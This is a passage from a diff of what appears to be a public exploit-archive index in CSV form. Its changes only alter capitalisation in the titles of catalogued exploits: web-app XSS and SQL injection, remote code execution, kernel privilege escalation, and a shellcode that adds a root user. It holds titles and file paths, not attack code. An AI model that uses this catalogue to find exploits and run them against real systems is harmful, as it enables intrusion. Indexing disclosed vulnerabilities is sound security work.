Scripting",2009-11-23,MustLive,php,webapps,0 33379,platforms/multiple/remote/33379.txt,"Apache Tomcat 3.2 - 404 Error Page Cross-Site Scripting",2009-09-02,MustLive,multiple,remote,0 @@ -30116,8 +30116,8 @@ id,file,description,date,author,platform,type,port 33386,platforms/multiple/dos/33386.html,"Mozilla Firefox 29.0 - Null Pointer Dereference",2014-05-16,Mr.XHat,multiple,dos,0 33387,platforms/linux/local/33387.txt,"check_dhcp - Nagios Plugins 2.0.1 - Arbitrary Option File Read",2014-05-16,"Dawid Golunski",linux,local,0 33388,platforms/linux/remote/33388.f,"Xfig and Transfig 3.2.5 - .fig Buffer Overflow",2009-12-03,pedamachephepto,linux,remote,0 -33389,platforms/php/webapps/33389.txt,"EGroupware 1.8.006 - Multiple Vulnerabilities",2014-05-16,"High-Tech Bridge SA",php,webapps,80 -33390,platforms/php/webapps/33390.txt,"Yoast Google Analytics for WordPress Plugin 3.2.4 - 404 Error Page Cross-Site Scripting",2009-12-04,intern0t,php,webapps,0 +33389,platforms/php/webapps/33389.txt,"eGroupWare 1.8.006 - Multiple Vulnerabilities",2014-05-16,"High-Tech Bridge SA",php,webapps,80 +33390,platforms/php/webapps/33390.txt,"Yoast Google Analytics for Wordpress Plugin 3.2.4 - 404 Error Page Cross-Site Scripting",2009-12-04,intern0t,php,webapps,0 33391,platforms/php/webapps/33391.txt,"YABSoft Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting",2009-12-07,"aBo MoHaMeD",php,webapps,0 33392,platforms/php/webapps/33392.txt,"YOOtheme Warp5 Joomla! Component - 'yt_color' Parameter Cross-Site Scripting",2009-12-04,andresg888,php,webapps,0 33393,platforms/php/webapps/33393.txt,"Joomla! You!Hostit! 1.0.1 Template - Cross-Site Scripting",2009-12-04,andresg888,php,webapps,0 @@ -30164,20 +30164,20 @@ id,file,description,date,author,platform,type,port 33468,platforms/php/webapps/33468.txt,"MercuryBoard 1.1.5 - 'index.php' Cross-Site Scripting",2010-01-04,indoushka,php,webapps,0 33469,platforms/php/webapps/33469.txt,"LXR 0.9.x - Cross Referencer Multiple Cross-Site Scripting Vulnerabilities",2010-01-05,"Dan Rosenberg",php,webapps,0 33470,platforms/php/webapps/33470.txt,"LineWeb 1.0.5 - Multiple Remote Vulnerabilities",2010-01-05,"Ignacio Garrido",php,webapps,0 -33471,platforms/hardware/remote/33471.txt,"D-LINK DKVM-IP8 - 'auth.asp' Cross-Site Scripting",2010-01-06,POPCORN,hardware,remote,0 +33471,platforms/hardware/remote/33471.txt,"D-Link DKVM-IP8 - 'auth.asp' Cross-Site Scripting",2010-01-06,POPCORN,hardware,remote,0 33472,platforms/multiple/dos/33472.py,"Sun Java System Web Server 6.1/7.0 - HTTP 'TRACE' Heap Buffer Overflow",2010-01-06,"Evgeny Legerov",multiple,dos,0 33473,platforms/php/webapps/33473.txt,"RoundCube Webmail 0.2 - Cross-Site Scripting",2010-01-06,"j4ck and Globus",php,webapps,0 33474,platforms/php/webapps/33474.txt,"Joomla! DM Orders Component - 'id' Parameter SQL Injection",2010-01-07,NoGe,php,webapps,0 33475,platforms/php/webapps/33475.txt,"dotProject 2.1.3 - Multiple SQL Injections / HTML Injection Vulnerabilities",2010-01-07,"Justin C. Klein Keane",php,webapps,0 33478,platforms/php/webapps/33478.txt,"Joomla! Jobads - 'type' Parameter SQL Injection",2010-01-08,N0KT4,php,webapps,0 -33479,platforms/osx/dos/33479.c,"Mac OS X 10.x - 'libc/strtod(3)' Memory Corruption",2010-01-08,"Maksymilian Arciemowicz",osx,dos,0 +33479,platforms/osx/dos/33479.c,"Mac OSX 10.x - 'libc/strtod(3)' Memory Corruption",2010-01-08,"Maksymilian Arciemowicz",osx,dos,0 33480,platforms/linux/dos/33480.txt,"MATLAB R2009b - 'dtoa' Implementation Memory Corruption",2010-01-08,"Maksymilian Arciemowicz",linux,dos,0 33481,platforms/asp/webapps/33481.txt,"DevWorx BlogWorx 1.0 - 'forum.asp' Cross-Site Scripting",2010-01-09,Cyber_945,asp,webapps,0 33482,platforms/php/webapps/33482.txt,"DigitalHive - 'mt' Parameter Cross-Site Scripting",2010-01-10,"ViRuSMaN ",php,webapps,0 33483,platforms/multiple/dos/33483.py,"Sun Java System Directory Server 7.0 - 'core_get_proxyauth_dn' Denial of Service",2010-01-10,Intevydis,multiple,dos,0 33484,platforms/php/webapps/33484.txt,"DeltaScripts PHP Links 1.0 - 'email' Parameter Cross-Site Scripting",2010-01-11,Crux,php,webapps,0 33485,platforms/php/webapps/33485.txt,"Jamit Job Board - 'post_id' Parameter Cross-Site Scripting",2010-01-11,Crux,php,webapps,0 -33486,platforms/php/webapps/33486.txt,"@lex Guestbook 5.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-11,"D3V!L FUCKER",php,webapps,0 +33486,platforms/php/webapps/33486.txt,"@lex GuestBook 5.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-11,"D3V!L FUCKER",php,webapps,0 33487,platforms/php/webapps/33487.txt,"PhPepperShop 2.5 - 'USER_ARTIKEL_HANDLING_AUFRUF.php' Cross-Site Scripting",2010-01-12,Crux,php,webapps,0 33488,platforms/php/webapps/33488.txt,"Active Calendar 1.2 - '$_SERVER['PHP_SELF']' Variable Multiple Cross-Site Scripting Vulnerabilities",2010-01-11,"Martin Barbella",php,webapps,0 33489,platforms/multiple/remote/33489.txt,"Ruby 1.9.1 - WEBrick Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 @@ -30206,7 +30206,7 @@ id,file,description,date,author,platform,type,port 33514,platforms/php/webapps/33514.txt,"Videos Tube 1.0 - Multiple SQL Injections",2014-05-26,"Mustafa ALTINKAYNAK",php,webapps,80 33646,platforms/php/webapps/33646.txt,"Joomla MS Comment Component 0.8.0b - Security Bypass / Cross-Site Scripting Vulnerabilities",2009-12-31,"Jeff Channell",php,webapps,0 33516,platforms/linux/local/33516.c,"Linux Kernel 3.14-rc1 <= 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0 -33518,platforms/hardware/webapps/33518.txt,"ZyXEL P-660HW-T1 3 Wireless Router - Cross-Site Request Forgery",2014-05-26,"Mustafa ALTINKAYNAK",hardware,webapps,80 +33518,platforms/hardware/webapps/33518.txt,"ZYXEL P-660HW-T1 3 Wireless Router - Cross-Site Request Forgery",2014-05-26,"Mustafa ALTINKAYNAK",hardware,webapps,80 33635,platforms/linux/dos/33635.c,"Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' NULL Pointer Dereference Denial of Service",2008-07-31,"Rémi Denis-Courmont",linux,dos,0 33520,platforms/hardware/webapps/33520.txt,"D-Link Routers - Multiple Vulnerabilities",2014-05-26,"Kyle Lovett",hardware,webapps,80 33521,platforms/multiple/remote/33521.rb,"Symantec Workspace Streaming - Arbitrary File Upload",2014-05-26,Metasploit,multiple,remote,9855 @@ -30288,7 +30288,7 @@ id,file,description,date,author,platform,type,port 33607,platforms/multiple/dos/33607.html,"Mozilla Firefox 3.5.x and SeaMonkey 2.0.1 - Remote Denial Of Service",2010-02-07,"599eme Man",multiple,dos,0 33608,platforms/windows/dos/33608.html,"Apple Safari 4.0.4 - Remote Denial Of Service",2010-02-07,"599eme Man",windows,dos,0 33610,platforms/windows/remote/33610.py,"Easy File Management Web Server 5.3 - UserID Remote Buffer Overflow (ROP)",2014-06-01,"Julien Ahrens",windows,remote,80 -33613,platforms/php/webapps/33613.txt,"WordPress Participants Database 1.5.4.8 Plugin - SQL Injection",2014-06-02,"Yarubo Research Team",php,webapps,80 +33613,platforms/php/webapps/33613.txt,"Wordpress Participants Database 1.5.4.8 Plugin - SQL Injection",2014-06-02,"Yarubo Research Team",php,webapps,80 33614,platforms/linux/local/33614.c,"dbus-glib pam_fprintd - Privilege Escalation",2014-06-02,"Sebastian Krahmer",linux,local,0 33615,platforms/multiple/remote/33615.txt,"JDownloader - 'JDExternInterface.java' Remote Code Execution",2010-02-08,apoc,multiple,remote,0 33616,platforms/multiple/remote/33616.txt,"Mongoose 2.8 - Space String Remote File Disclosure",2010-02-08,"Pouya Daneshmand",multiple,remote,0 @@ -30341,7 +30341,7 @@ id,file,description,date,author,platform,type,port 33673,platforms/php/webapps/33673.pl,"HD FLV Player Component for Joomla! - 'id' Parameter SQL Injection",2010-02-24,kaMtiEz,php,webapps,0 33674,platforms/php/webapps/33674.txt,"OpenInferno OI.Blogs 1.0 - Multiple Local File Inclusion",2010-02-24,JIKO,php,webapps,0 33679,platforms/php/webapps/33679.txt,"TRUC 0.11 - 'login_reset_password_page.php' Cross-Site Scripting",2010-02-28,snakespc,php,webapps,0 -33680,platforms/php/webapps/33680.txt,"Open Educational System 0.1 beta - 'CONF_INCLUDE_PATH' Parameter Multiple Remote File Inclusion",2010-02-28,"cr4wl3r ",php,webapps,0 +33680,platforms/php/webapps/33680.txt,"Open Educational System 0.1 Beta - 'CONF_INCLUDE_PATH' Parameter Multiple Remote File Inclusion",2010-02-28,"cr4wl3r ",php,webapps,0 33681,platforms/php/webapps/33681.txt,"SLAED CMS 4 - Installation Script Unauthorized Access",2010-02-27,indoushka,php,webapps,0 33682,platforms/multiple/remote/33682.txt,"Oracle Siebel 7.7/7.8 - 'loyalty_enu/start.swe' Cross-Site Scripting",2010-03-01,Lament,multiple,remote,0 33683,platforms/php/webapps/33683.txt,"Article Friendly - 'filename' Parameter Local File Inclusion",2010-03-01,"pratul agrawal",php,webapps,0 @@ -30459,7 +30459,7 @@ id,file,description,date,author,platform,type,port 33810,platforms/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch - Malformed 'Throw' Exception Remote Code Execution",2010-03-26,"Nishant Das Patnaik",osx,remote,0 33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch - Malformed Webpage Remote Code Execution",2010-03-26,"Nishant Das Patnaik",osx,remote,0 33812,platforms/php/webapps/33812.txt,"Joomla! 'com_weblinks' Component - 'id' Parameter SQL Injection",2010-03-29,"Pouya Daneshmand",php,webapps,0 -33813,platforms/php/webapps/33813.html,"Fuctweb CapCC Plugin 1.0 for WordPress - 'plugins.php' SQL Injection",2008-12-13,MustLive,php,webapps,0 +33813,platforms/php/webapps/33813.html,"Fuctweb CapCC Plugin 1.0 for Wordpress - 'plugins.php' SQL Injection",2008-12-13,MustLive,php,webapps,0 33814,platforms/php/webapps/33814.txt,"Piwik 0.5.5 - 'form_url' Parameter Cross-Site Scripting",2010-03-31,garwga,php,webapps,0 33815,platforms/php/webapps/33815.txt,"OSSIM 2.2.1 - '$_SERVER['PHP_SELF']' Parameter Cross-Site Scripting",2010-03-31,"CONIX Security",php,webapps,0 33816,platforms/multiple/remote/33816.pl,"Miranda IM 0.8.16 - Information Disclosure",2010-04-06,"Jan Schejbal",multiple,remote,0 @@ -30468,7 +30468,7 @@ id,file,description,date,author,platform,type,port 33819,platforms/windows/dos/33819.txt,"McAfee Email Gateway < 6.7.2 Hotfix 2 - Multiple Vulnerabilities",2010-04-06,"Nahuel Grisolia",windows,dos,0 33820,platforms/php/webapps/33820.txt,"PotatoNews 1.0.2 - 'nid' Parameter Multiple Local File Inclusion",2010-04-07,mat,php,webapps,0 33821,platforms/php/webapps/33821.html,"n-cms-equipe 1.1c.Debug - Multiple Local File Inclusion",2010-02-24,ITSecTeam,php,webapps,0 -33822,platforms/hardware/webapps/33822.sh,"D-link DSL-2760U-E1 - Persistent Cross-Site Scripting",2014-06-21,"Yuval tisf Nativ",hardware,webapps,0 +33822,platforms/hardware/webapps/33822.sh,"D-Link DSL-2760U-E1 - Persistent Cross-Site Scripting",2014-06-21,"Yuval tisf Nativ",hardware,webapps,0 33852,platforms/windows/remote/33852.txt,"HTTP 1.1 - GET Request Directory Traversal",2010-06-20,chr1x,windows,remote,0 33853,platforms/php/webapps/33853.txt,"Kleophatra CMS 0.1.1 - 'module' Parameter Cross-Site Scripting",2010-04-19,anT!-Tr0J4n,php,webapps,0 33824,platforms/linux/local/33824.c,"Linux Kernel 3.13 - Privilege Escalation PoC (gid)",2014-06-21,"Vitaly Nikolenko",linux,local,0 @@ -30494,7 +30494,7 @@ id,file,description,date,author,platform,type,port 33846,platforms/php/webapps/33846.txt,"ZeroCMS 1.0 - (zero_transact_article.php article_id POST parameter) SQL Injection",2014-06-23,"Filippos Mastrogiannis",php,webapps,0 33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - (.nkuser) File Creation NULL Pointer Denial Of Service",2014-06-13,"A reliable source",windows,dos,0 33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 - Memory Consumption Remote Denial of Service",2010-04-27,fallenpegasus,linux,dos,0 -33851,platforms/php/webapps/33851.txt,"WordPress TimThumb 2.8.13 WebShot Plugin/Theme - Remote Code Execution",2014-06-24,@u0x,php,webapps,0 +33851,platforms/php/webapps/33851.txt,"Wordpress TimThumb 2.8.13 WebShot Plugin/Theme - Remote Code Execution",2014-06-24,@u0x,php,webapps,0 33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 - Source Code Information Disclosure",2010-04-22,"Veerendra G.G",multiple,remote,0 33860,platforms/windows/dos/33860.html,"Microsoft Internet Explorer 8 / 9 / 10 - CInput Use-After-Free Crash PoC (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos,0 33854,platforms/php/webapps/33854.txt,"vBulletin Two-Step External Link Module - 'externalredirect.php' Cross-Site Scripting",2010-04-20,"Edgard Chammas",php,webapps,0 @@ -30539,7 +30539,7 @@ id,file,description,date,author,platform,type,port 40096,platforms/multiple/dos/40096.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (2)",2016-07-13,COSIG,multiple,dos,0 40097,platforms/multiple/dos/40097.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (3)",2016-07-13,COSIG,multiple,dos,0 40098,platforms/multiple/dos/40098.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (4)",2016-07-13,COSIG,multiple,dos,0 -33896,platforms/php/webapps/33896.txt,"WordPress Simple Share Buttons Adder Plugin 4.4 - Multiple Vulnerabilities",2014-06-27,dxw,php,webapps,80 +33896,platforms/php/webapps/33896.txt,"Wordpress Simple Share Buttons Adder Plugin 4.4 - Multiple Vulnerabilities",2014-06-27,dxw,php,webapps,80 33897,platforms/multiple/webapps/33897.txt,"Endeca Latitude 2.2.2 - Cross-Site Request Forgery",2014-06-27,"RedTeam Pentesting",multiple,webapps,0 33899,platforms/linux/local/33899.txt,"Chkrootkit 0.49 - Privilege Escalation",2014-06-28,"Thomas Stangner",linux,local,0 33900,platforms/windows/remote/33900.pl,"Serenity Audio Player 3.2.3 - '.m3u' Buffer Overflow",2010-04-26,Madjix,windows,remote,0 @@ -30621,14 +30621,14 @@ id,file,description,date,author,platform,type,port 33987,platforms/php/webapps/33987.txt,"PHP Banner Exchange 1.2 - 'signupconfirm.php' Cross-Site Scripting",2010-01-03,indoushka,php,webapps,0 34112,platforms/windows/local/34112.txt,"Microsoft Windows XP SP3 - MQAC.sys Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,windows,local,0 33990,platforms/multiple/remote/33990.rb,"Gitlist - Unauthenticated Remote Command Execution",2014-07-07,Metasploit,multiple,remote,80 -33991,platforms/php/remote/33991.rb,"WordPress MailPoet Newsletters 2.6.8 Plugin - (wysija-newsletters) Unauthenticated File Upload",2014-07-07,Metasploit,php,remote,80 +33991,platforms/php/remote/33991.rb,"Wordpress MailPoet Newsletters 2.6.8 Plugin - (wysija-newsletters) Unauthenticated File Upload",2014-07-07,Metasploit,php,remote,80 33992,platforms/asp/webapps/33992.txt,"Platnik 8.1.1 - Multiple SQL Injections",2010-05-17,podatnik386,asp,webapps,0 33993,platforms/php/webapps/33993.txt,"Planet Script 1.x - 'idomains.php' Cross-Site Scripting",2010-05-14,Mr.ThieF,php,webapps,0 33994,platforms/php/webapps/33994.txt,"PonVFTP - Insecure Cookie Authentication Bypass",2010-05-17,SkuLL-HackeR,php,webapps,0 33995,platforms/multiple/webapps/33995.txt,"Blaze Apps 1.x - SQL Injection / HTML Injection",2010-01-19,"AmnPardaz Security Research Team",multiple,webapps,0 33996,platforms/ios/webapps/33996.txt,"Photo Org WonderApplications 8.3 iOS - File Include",2014-07-07,Vulnerability-Lab,ios,webapps,0 33999,platforms/php/webapps/33999.txt,"Mobile Chat 2.0.2 - 'chatsmileys.php' Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0 -34000,platforms/multiple/webapps/34000.txt,"Serialsystem 1.0.4 BETA - 'list' Parameter Cross-Site Scripting",2010-01-18,indoushka,multiple,webapps,0 +34000,platforms/multiple/webapps/34000.txt,"Serialsystem 1.0.4 Beta - 'list' Parameter Cross-Site Scripting",2010-01-18,indoushka,multiple,webapps,0 34001,platforms/linux/local/34001.c,"Linux Kernel 2.6.x - Btrfs Cloned File Security Bypass",2010-05-18,"Dan Rosenberg",linux,local,0 34002,platforms/windows/remote/34002.c,"TeamViewer 5.0.8232 - Remote Buffer Overflow",2010-05-18,"fl0 fl0w",windows,remote,0 34003,platforms/php/webapps/34003.txt,"Percha Image Attach 1.1 Component for Joomla! - 'index.php' controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 @@ -30701,7 +30701,7 @@ id,file,description,date,author,platform,type,port 34136,platforms/multiple/remote/34136.txt,"Plesk Server Administrator (PSA) - 'locale' Parameter Local File Inclusion",2010-06-21,"Pouya Daneshmand",multiple,remote,0 34114,platforms/php/webapps/34114.txt,"Joomla! JReservation Component - Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps,0 34086,platforms/linux/webapps/34086.txt,"Bitdefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",linux,webapps,443 -34087,platforms/php/webapps/34087.txt,"Joomla Youtube Gallery Component - SQL Injection",2014-07-16,"Pham Van Khanh",php,webapps,80 +34087,platforms/php/webapps/34087.txt,"Joomla YouTube Gallery Component - SQL Injection",2014-07-16,"Pham Van Khanh",php,webapps,80 34153,platforms/php/webapps/34153.txt,"2DayBiz ybiz Network Community Script - SQL Injection / Cross-Site Scripting",2010-06-16,Sid3^effects,php,webapps,0 34138,platforms/php/webapps/34138.txt,"VideoWhisper PHP 2 Way Video Chat - 'r' Parameter Cross-Site Scripting",2010-06-14,Sid3^effects,php,webapps,0 34077,platforms/php/webapps/34077.txt,"TPO Duyuru Scripti - Insecure Cookie Authentication Bypass",2010-06-02,Septemb0x,php,webapps,0 @@ -30712,7 +30712,7 @@ id,file,description,date,author,platform,type,port 34082,platforms/php/webapps/34082.txt,"Obsession-Design Image-Gallery 1.1 - 'display.php' Cross-Site Scripting",2010-01-02,kaMtiEz,php,webapps,0 34083,platforms/php/webapps/34083.txt,"Western Digital My Book World Edition 1.1.16 - 'lang' Parameter Cross-Site Scripting",2009-12-30,emgent,php,webapps,0 34084,platforms/php/webapps/34084.txt,"L2Web LineWeb 1.0.5 - Multiple Input Validation Vulnerabilities",2010-01-06,"Ignacio Garrido",php,webapps,0 -34085,platforms/php/webapps/34085.txt,"Gigya Socialize Plugin 1.0/1.1.x for WordPress - Cross-Site Scripting",2010-06-04,MustLive,php,webapps,0 +34085,platforms/php/webapps/34085.txt,"Gigya Socialize Plugin 1.0/1.1.x for Wordpress - Cross-Site Scripting",2010-06-04,MustLive,php,webapps,0 34137,platforms/php/webapps/34137.txt,"Joomla! 'com_videowhisper_2wvc' Component - Cross-Site Scripting",2010-06-10,Sid3^effects,php,webapps,0 34088,platforms/android/remote/34088.html,"Boat Browser 8.0 / 8.0.1 - Remote Code Execution",2014-07-16,c0otlass,android,remote,0 34089,platforms/php/webapps/34089.txt,"Bilboplanet 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2014-07-16,"Vivek N",php,webapps,80 @@ -30742,7 +30742,7 @@ id,file,description,date,author,platform,type,port 40296,platforms/php/webapps/40296.txt,"FreePBX 13.0.35 - Remote Command Execution",2016-08-29,0x4148,php,webapps,0 34140,platforms/php/webapps/34140.txt,"AneCMS 1.x - 'modules/blog/index.php' HTML Injection",2010-06-11,"High-Tech Bridge SA",php,webapps,0 34113,platforms/php/webapps/34113.py,"SilverStripe CMS 2.4 - File Renaming Security Bypass",2010-06-09,"John Leitch",php,webapps,0 -34105,platforms/php/webapps/34105.txt,"WordPress Plugin Gallery Objects 0.4 - SQL Injection",2014-07-18,"Claudio Viviani",php,webapps,80 +34105,platforms/php/webapps/34105.txt,"Wordpress Plugin Gallery Objects 0.4 - SQL Injection",2014-07-18,"Claudio Viviani",php,webapps,80 34106,platforms/php/webapps/34106.txt,"cPanel 11.25 Image Manager - 'target' Parameter Local File Inclusion",2010-06-07,"AnTi SeCuRe",php,webapps,0 34107,platforms/php/webapps/34107.txt,"boastMachine 3.1 - 'key' Parameter Cross-Site Scripting",2010-06-07,"High-Tech Bridge SA",php,webapps,0 34108,platforms/java/webapps/34108.txt,"PRTG Traffic Grapher 6.2.1 - 'url' Parameter Cross-Site Scripting",2009-01-08,"Patrick Webster",java,webapps,0 @@ -30750,7 +30750,7 @@ id,file,description,date,author,platform,type,port 34110,platforms/php/webapps/34110.txt,"PG Auto Pro - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps,0 34111,platforms/multiple/webapps/34111.txt,"GREEZLE - Global Real Estate Agent Login Multiple SQL Injection",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0 34339,platforms/php/webapps/34339.txt,"Pligg 1.0.4 - 'search.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 -34124,platforms/php/webapps/34124.txt,"WordPress WP BackupPlus - Database And Files Backup Download",2014-07-20,pSyCh0_3D,php,webapps,0 +34124,platforms/php/webapps/34124.txt,"Wordpress WP BackupPlus - Database And Files Backup Download",2014-07-20,pSyCh0_3D,php,webapps,0 34130,platforms/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection (Metasploit)",2014-07-21,"Brandon Perry",linux,webapps,80 34126,platforms/windows/remote/34126.txt,"Microsoft Help and Support Center - 'sysinfo/sysinfomain.htm' Cross-Site Scripting",2010-06-10,"Tavis Ormandy",windows,remote,0 34127,platforms/php/webapps/34127.txt,"Arab Portal 2.2 - 'members.php' SQL Injection",2010-06-10,SwEET-DeViL,php,webapps,0 @@ -30760,7 +30760,7 @@ id,file,description,date,author,platform,type,port 34132,platforms/php/remote/34132.txt,"IBM GCM16/32 1.20.0.22575 - Multiple Vulnerabilities",2014-07-21,"Alejandro Alvarez Bravo",php,remote,443 34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 - mod_status Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0 34134,platforms/lin_x86-64/local/34134.c,"Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Privilege Escalation",2014-07-21,"Vitaly Nikolenko",lin_x86-64,local,0 -34161,platforms/php/webapps/34161.txt,"WordPress Video Gallery Plugin 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",php,webapps,80 +34161,platforms/php/webapps/34161.txt,"Wordpress Video Gallery Plugin 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",php,webapps,80 34135,platforms/windows/dos/34135.py,"DjVuLibre 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0 34149,platforms/hardware/webapps/34149.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",hardware,webapps,0 34158,platforms/windows/dos/34158.txt,"Chrome Engine 4 - Denial Of Service",2010-06-17,"Luigi Auriemma",windows,dos,0 @@ -30798,7 +30798,7 @@ id,file,description,date,author,platform,type,port 34191,platforms/php/remote/34191.py,"Oxwall 1.7.0 - Remote Code Execution Exploit",2014-07-28,LiquidWorm,php,remote,80 34192,platforms/linux/remote/34192.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - XSLT Integer Overflow",2010-06-22,"Martin Barbella",linux,remote,0 34194,platforms/asp/webapps/34194.txt,"Lois Software WebDB 2.0A Script - Multiple SQL Injections",2010-06-24,"High-Tech Bridge SA",asp,webapps,0 -34195,platforms/php/webapps/34195.txt,"WordPress Cimy Counter 0.9.4 Plugin - HTTP Response Splitting / Cross-Site Scripting",2010-05-05,MustLive,php,webapps,0 +34195,platforms/php/webapps/34195.txt,"Wordpress Cimy Counter 0.9.4 Plugin - HTTP Response Splitting / Cross-Site Scripting",2010-05-05,MustLive,php,webapps,0 34196,platforms/ios/webapps/34196.txt,"WiFi HD 7.3.0 iOS - Multiple Vulnerabilities",2014-07-29,Vulnerability-Lab,ios,webapps,0 34197,platforms/php/webapps/34197.txt,"AbleSpace 1.0 - 'news.php' SQL Injection",2010-06-25,JaMbA,php,webapps,0 34198,platforms/php/webapps/34198.txt,"Limny 2.1 - 'q' Parameter Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0 @@ -30843,7 +30843,7 @@ id,file,description,date,author,platform,type,port 34239,platforms/php/webapps/34239.txt,"Status2k Server Monitoring Software - Multiple Vulnerabilities",2014-08-02,"Shayan S",php,webapps,80 34240,platforms/ios/webapps/34240.txt,"TigerCom iFolder+ 1.2 iOS - Multiple Vulnerabilities",2014-08-02,Vulnerability-Lab,ios,webapps,8080 34241,platforms/linux/webapps/34241.txt,"ISPConfig 3.0.54p1 - Authenticated Admin Privilege Escalation",2014-08-02,mra,linux,webapps,8080 -34336,platforms/php/webapps/34336.html,"WordPress Disqus 2.7.5 Plugin - Admin PersistentCross-Site Request Forgery / Cross-Site Scripting",2014-08-14,"Nik Cubrilovic",php,webapps,80 +34336,platforms/php/webapps/34336.html,"Wordpress Disqus 2.7.5 Plugin - Admin PersistentCross-Site Request Forgery / Cross-Site Scripting",2014-08-14,"Nik Cubrilovic",php,webapps,80 34337,platforms/php/webapps/34337.txt,"Gekko Web Builder 9.0 - 'index.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34338,platforms/php/webapps/34338.html,"Pixie 1.0.4 - HTML Injection / Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34243,platforms/ios/webapps/34243.txt,"Photo WiFi Transfer 1.01 - Directory Traversal",2014-08-02,Vulnerability-Lab,ios,webapps,8080 @@ -30864,7 +30864,7 @@ id,file,description,date,author,platform,type,port 34259,platforms/php/webapps/34259.txt,"Bitweaver 2.7 - 'fImg' Parameter Cross-Site Scripting",2010-07-05,"John Leitch",php,webapps,0 34260,platforms/php/webapps/34260.txt,"odCMS 1.07 - 'archive.php' Cross-Site Scripting",2010-07-05,"John Leitch",php,webapps,0 34261,platforms/multiple/dos/34261.txt,"Unreal Engine 2.5 - 'UpdateConnectingMessage()' Remote Stack Buffer Overflow",2010-07-06,"Luigi Auriemma",multiple,dos,0 -34262,platforms/lin_x86/shellcode/34262.c,"Linux/x86 - chmod (777 /etc/passwd & /etc/shadow)_ Add New Root User (ALI/ALI) & Execute /bin/sh shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",lin_x86,shellcode,0 +34262,platforms/lin_x86/shellcode/34262.c,"Linux/x86 - chmod (777 /etc/passwd & /etc/shadow)_ Add New Root User (ALI/ALI) & Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",lin_x86,shellcode,0 34263,platforms/ios/webapps/34263.txt,"Video WiFi Transfer 1.01 - Directory Traversal",2014-08-04,Vulnerability-Lab,ios,webapps,8080 34264,platforms/ios/webapps/34264.txt,"FreeDisk 1.01 iOS - Multiple Vulnerabilities",2014-08-04,Vulnerability-Lab,ios,webapps,8080 34265,platforms/php/webapps/34265.txt,"Exponent CMS 0.97 - 'slideshow.js.php' Cross-Site Scripting",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0 @@ -30882,7 +30882,7 @@ id,file,description,date,author,platform,type,port 34528,platforms/multiple/dos/34528.py,"Adobe Acrobat and Reader 9.3.4 - 'AcroForm.api' Memory Corruption",2010-08-25,ITSecTeam,multiple,dos,0 34277,platforms/php/webapps/34277.txt,"Feng Office - Persistent Cross-Site Scripting",2014-08-06,"Juan Sacco",php,webapps,0 34527,platforms/windows/webapps/34527.c,"Acunetix Web Vulnerability Scanner - DLL Loading Arbitrary Code Execution",2010-08-25,Kolor,windows,webapps,0 -34280,platforms/php/webapps/34280.txt,"PHPFABER CMS 2.0.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-04,prodigy,php,webapps,0 +34280,platforms/php/webapps/34280.txt,"phpFaber CMS 2.0.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-04,prodigy,php,webapps,0 34281,platforms/windows/dos/34281.py,"MP3 Cutter 1.8 MP3 - File Processing Remote Denial of Service",2010-07-09,"Prashant Uniyal",windows,dos,0 34282,platforms/php/webapps/34282.txt,"Real Estate Manager 1.0.1 - 'index.php' Cross-Site Scripting",2010-07-09,bi0,php,webapps,0 34283,platforms/php/webapps/34283.txt,"Model Agency Manager - 'search_process.php' Cross-Site Scripting",2009-12-13,bi0,php,webapps,0 @@ -30941,7 +30941,7 @@ id,file,description,date,author,platform,type,port 34350,platforms/php/webapps/34350.txt,"Sourcefabric Campsite Articles - HTML Injection",2010-07-15,D4rk357,php,webapps,0 34351,platforms/php/webapps/34351.html,"BOLDfx eUploader 3.1.1 - 'admin.php' Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic ",php,webapps,0 34352,platforms/php/webapps/34352.html,"BOLDfx Recipe Script 5.0 - Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic 